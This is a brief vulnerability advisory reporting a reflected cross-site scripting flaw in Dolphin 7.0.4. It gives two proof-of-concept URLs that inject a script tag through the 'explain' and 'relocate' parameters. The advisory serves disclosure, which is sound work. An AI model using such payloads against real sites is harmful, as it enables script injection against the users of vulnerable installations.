Dolphin 7.0.4 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................Dolphin 7.0.4
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.boonex.com/dolphin/
Discovery Date..........2/10/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in Dolphin 7.0.4 can be
exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/dolphin/explanation.php?explain=%3Cscript%3Ealert(0)%3C/script%3E

http://localhost/dolphin/modules/boonex/custom_rss/post_mod_crss.php?relocate=%22%3E%3Cscript%3Ealert(0)%3C/script%3E